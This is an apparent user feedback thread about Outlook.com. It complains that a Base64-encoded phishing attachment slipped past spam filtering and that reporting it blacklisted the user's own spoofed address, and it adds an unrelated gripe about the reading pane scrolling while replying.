I am getting this phishing email with an HTM attachment, BASE64 encoded of course, which then contains a webform with all assets, all parts BASE64 encoded. The form attempts to phish my password.
The Outlook.com spam filter does not recognize this blatant phish and delivers it as a legit email. I chose to report this phishing attempt so that Outlook.com recognizes this for future such emails.
Outlook chooses to put the sender on the blacklist and does not recognize that the FROM address contains my own mail address. If I did not check the source code of this mail, I would not even be aware that I am now unable to send myself documents.
Team, this is your fix list:
- BASE64 is no rocket science and the HTM file makes it blatantly obvious it tries to steal passwords. This should be the easiest quarantine target out there if you take security seriously.
- Blacklisting your own email address should really not be in the tool chest of a mail client, should it?
Update: I received helpful feedback from Microsoft on this issue. Safe Sender overrode spam detection in this case. Teams are working on both how to modernize this space more holistically and how to fix the anti-phishing gap.
forwarded to PM on Outlook team. (retiring at end of the month, btw!)
PM is or you are?
Sometimes (only sometimes) I do miss my good old Notes email client …
Something that always goes on my nerves:
When I have a mail open in the main outlook page and the mails are visible in the right side….and I reply to it in a new window…. the right side always scrolls up automatically when I type
this is really disturbing as i sometimes scroll down to an “older” mail in the mail thread while typing (to readup something)…